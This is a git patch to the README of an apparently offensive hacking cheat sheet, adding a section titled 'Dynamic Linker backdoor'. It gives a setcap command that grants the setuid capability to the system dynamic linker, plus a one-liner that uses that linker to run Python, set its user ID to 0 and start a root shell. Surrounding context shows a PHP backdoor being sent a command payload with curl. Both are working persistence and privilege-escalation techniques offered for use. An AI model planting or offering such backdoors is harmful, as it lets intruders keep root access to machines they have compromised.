From 338d966bce0470c4d2bc61ce868c10ee2561c29e Mon Sep 17 00:00:00 2001
From: Jacopo Cavallo <jacopo.cavallo@protonmail.com>
Date: Mon, 29 May 2023 15:05:45 +0200
Subject: [PATCH] add dynamic linker backdoor

---
 README.md | 13 +++++++++++++
 1 file changed, 13 insertions(+)

diff --git a/README.md b/README.md
index 38157c4..cc1b93e 100644
--- a/README.md
+++ b/README.md
@@ -55,6 +55,7 @@ Got tricks? Join us on Telegram: [https://t.me/thcorg](https://t.me/thcorg)
    1. [authorized_keys](#backdoor-auth-keys)
    1. [Remote access an entire network](#backdoor-network)
    1. [Smallest PHP backdoor](#carriage-return-backdoor) 
+   1. [Dynamic Linker backdoor](#ld-backdoor)
 1. [Shell Hacks](#shell-hacks)
    1. [Shred files (secure delete)](#shred)
    1. [Restore the date of a file](#restore-timestamp)
@@ -1100,6 +1101,18 @@ curl http://127.0.0.1:8080/test.php
 curl http://127.0.0.1:8080/test.php -d 0="ps fax; uname -mrs; id"
 ```
 
+<a id="ld-backdoor"></a>
+**6.v. Dynamic Linker Backdoor**
+
+Give the setuid capability to the dynamic linker:
+```bash
+sudo setcap cap_setuid+ep /lib/x86_64-linux-gnu/ld-linux-x86-64.so.2
+```
+Then to become root:
+```bash
+/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 /usr/bin/python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'
+```
+
 ---
 <a id="shell-hacks"></a>
 ## 7. Shell Hacks